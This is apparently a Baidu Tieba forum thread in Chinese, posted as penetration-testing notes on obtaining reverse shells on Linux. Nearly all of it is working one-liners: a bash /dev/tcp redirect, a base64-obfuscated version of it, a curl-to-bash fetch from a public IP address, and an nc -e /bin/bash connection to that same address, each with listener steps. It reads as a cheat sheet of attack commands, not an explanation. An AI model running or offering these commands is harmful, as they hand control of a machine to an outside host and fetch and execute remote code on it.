网页
资讯
视频
图片
知道
文库
贴吧
地图
采购
进入贴吧
全吧搜索
吧内搜索
搜贴
搜人
进吧
搜标签
日
一
二
三
四
五
六
签到排名:今日本吧第
个签到,
本吧因你更精彩,明天继续来努力!
本吧签到人数:0
一键签到
可签
7
级以上的吧
50
个
一键签到
本月漏签
0
次!
0
成为超级会员,赠送8张补签卡
如何使用?
点击日历上漏签日期,即可进行
补签
。
连续签到:
天 累计签到:
天
0
超级会员单次开通12个月以上,赠送连续签到卡3张
使用连续签到卡
04月12日
漏签
0
天
武汉茑萝吧
关注:
8
贴子:
1,253
看贴
图片
吧主推荐
游戏
5
回复贴,共
1
页
<返回武汉茑萝吧
>0< 加载中...
武汉茑萝:Linux下反弹shell
只看楼主
收藏
回复
茑萝poptest
铁杆吧友
9
该楼层疑似违规已被系统折叠
隐藏此楼
查看此楼
在渗透过程中,目标处于内网环境,或因为端口限制而我们无法直连目标机器,此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell,以便继续深入。记录几个常用的。
送TA礼物
1楼
2022-07-27 10:31
回复
茑萝poptest
铁杆吧友
9
该楼层疑似违规已被系统折叠
隐藏此楼
查看此楼
bash反弹
1. 靶机上执行
bash -i >& /dev/tcp/xx.xx.xx/8000 0>&1
收到shell
2楼
2022-07-27 10:32
回复
收起回复
茑萝poptest
铁杆吧友
9
该楼层疑似违规已被系统折叠
隐藏此楼
查看此楼
2. 在特殊情况可以使用base64编码执行bash反弹shell
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAuMTA0LzgwMDAgIDA+JjE=}|{base64,-d}|{bash,-i}'
3楼
2022-07-27 10:32
回复
收起回复
茑萝poptest
铁杆吧友
9
该楼层疑似违规已被系统折叠
隐藏此楼
查看此楼
curl反弹
1. vps开启一个web服务,端口80。并编写index.html文件,内容包含bash一句话即可
python3 -m http.server 80vim index.htmlbash -i >& /dev/tcp/vps ip/port 0>&1
4楼
2022-07-27 10:32
回复
收起回复
茑萝poptest
铁杆吧友
9
该楼层疑似违规已被系统折叠
隐藏此楼
查看此楼
2. vps开启监听
nc -lvnp 6666
3. 靶机执行
curl 39.100.88.162/index.html|bash
成功接收反弹shell
5楼
2022-07-27 10:32
回复
收起回复
茑萝poptest
铁杆吧友
9
该楼层疑似违规已被系统折叠
隐藏此楼
查看此楼
nc反弹
nc -e /bin/bash 39.100.88.162 8000
#或者是/bin/sh都行
-e后面跟的参数代表的是在创建连接后执行的程序,这里代表在连接到远程后可以在远程执行一个本地shell(/bin/bash),也就是反弹一个shell给远程,可以看到远程已经成功反弹到了shell,并且可以执行命令。
6楼
2022-07-27 10:32
回复
收起回复
登录百度账号
扫二维码下载贴吧客户端
下载贴吧APP
看高清直播、视频!
贴吧热议榜
1
奉陪到底!对美关税超级加倍
1768830
2
TES被iG狠狠抽陀螺
1323038
3
北京大风到哪了
1253140
4
甲亢哥人在蒙古心在中国
879849
5
毒贩改行向老美走私鸡蛋
630500
6
张维为对关税形势早有预判
501075
7
《NIKKE》国服联动庆余年引热议
406656
8
美股崩盘懂王却赚翻了
346173
9
小米回应SU7撞电动车后焚毁
320078
10
欧盟要给中国电动车开绿灯了吗
246981
贴吧页面意见反馈
违规贴吧举报反馈通道
贴吧违规信息处理公示